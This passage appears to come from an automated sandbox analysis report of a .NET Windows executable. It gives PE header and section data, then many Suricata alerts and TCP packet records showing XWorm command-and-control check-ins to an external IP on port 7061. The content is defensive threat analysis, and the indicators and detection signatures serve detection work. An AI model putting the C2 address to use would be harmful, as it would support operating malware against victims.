                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x7f5980x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x5a4.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x820000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x7d9340x70.text
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000x7d5f00x7d600e6623bac736e308a671138dfef5cf38dFalse0.881725916001994data7.62631097980793IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x800000x5a40x600d22bc83a178d01cdd78faab767ace05aFalse0.4186197916666667data4.054232110871496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x820000xc0x2005da70d694fa5a00a6b01d3a467a9b3f6False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_VERSION0x800900x314data0.434010152284264
                                                                  RT_MANIFEST0x803b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-02T22:05:43.176015+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:05:43.176015+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:05:44.227321+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:05:44.790619+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:05:44.792711+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:05:55.884093+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:05:55.885979+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:06:06.994799+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:07.009201+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:06:13.138814+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:13.138814+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:18.105775+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:18.129003+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:06:29.234953+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:29.243496+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:06:33.158204+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:33.249214+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:06:39.610174+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:39.614440+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:06:41.029021+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:41.030624+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:06:41.268597+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:41.270089+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:06:41.572434+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:06:43.128361+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:43.128361+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:43.628687+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:43.630432+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:06:44.488521+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:44.492086+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:06:46.578848+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:46.585300+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:06:48.988967+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:06:48.990594+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:00.435045+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:00.440880+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:10.690522+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:10.692084+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:12.908911+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:12.915369+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:13.148654+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:13.148654+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:13.403770+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:13.920690+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:18.263880+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:18.266927+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:23.913779+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:23.922106+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:28.169006+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:28.501242+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:28.502759+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:28.740956+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:28.743182+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:28.978533+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:28.983451+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:29.219260+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:29.221134+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:37.278608+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:37.285940+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:39.555199+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:39.557443+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:43.140971+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:43.140971+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:44.372757+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:44.374746+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:49.482576+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:49.491448+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:49.718348+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:49.719946+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:50.008027+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:50.009606+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:07:59.940548+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:07:59.947483+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:08:00.271031+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:00.275330+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:08:00.543720+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:00.545398+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:08:05.428683+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:05.431454+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:08:13.145222+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:13.145222+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:16.208356+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:16.212491+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:08:27.338646+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:27.342286+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:08:36.499975+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:36.503489+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:08:40.998799+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:41.001640+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:08:41.258519+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:41.260237+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:08:43.139674+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:43.139674+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:43.438469+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:43.440421+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:08:50.521751+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:08:50.527074+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:09:02.341593+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:09:02.344563+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP
                                                                  2024-12-02T22:09:08.038302+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.250.180.1787061192.168.2.649770TCP
                                                                  2024-12-02T22:09:08.039041+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649770104.250.180.1787061TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 2, 2024 22:05:32.944418907 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:05:33.065469027 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:05:33.065558910 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:05:33.140398979 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:05:33.261657953 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:05:43.176014900 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:05:43.225071907 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:05:44.227320910 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:05:44.347311020 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:05:44.790618896 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:05:44.792711020 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:05:44.912872076 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:05:55.319575071 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:05:55.439724922 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:05:55.884093046 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:05:55.885978937 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:05:56.005949974 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:06.413527966 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:06.533513069 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:06.994798899 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:07.009201050 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:07.129306078 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:13.138813972 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:13.178250074 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:17.506647110 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:17.626746893 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:18.105775118 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:18.129003048 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:18.248944998 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:28.600675106 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:28.720561028 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:29.234952927 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:29.243495941 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:29.364645958 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:32.600394011 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:32.720257044 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:33.158204079 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:33.209595919 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:33.249213934 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:33.369098902 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:39.053776979 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:39.173749924 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:39.610173941 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:39.614439964 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:39.734457970 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:40.459836006 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:40.579783916 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:40.579845905 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:40.700889111 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:40.700953007 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:40.820918083 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:41.029021025 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:41.030623913 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:41.150635004 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:41.268596888 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:41.270088911 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:41.447278023 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:41.570369005 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:41.572433949 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:41.692378998 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:41.692486048 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:41.812597990 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:43.069216013 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:43.128360987 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:43.178378105 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:43.189114094 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:43.628686905 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:43.630431890 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:43.750416040 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:43.913048029 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:44.033112049 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:44.488521099 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:44.492085934 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:44.611989021 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:46.006845951 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:46.126734972 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:46.578847885 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:46.585299969 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:46.705275059 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:48.397301912 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:48.517301083 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:48.988966942 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:48.990593910 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:49.110584021 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:59.022656918 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:59.142566919 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:00.435045004 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:00.440880060 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:00.560961008 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:10.116122961 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:10.236143112 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:10.690521955 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:10.692084074 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:10.812009096 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:12.319464922 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:12.439415932 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:12.439462900 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:12.559308052 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:12.559360981 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:12.679224014 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:12.679307938 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:12.799201012 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:12.908910990 CET706149770104.250.180.178192.168.2.6
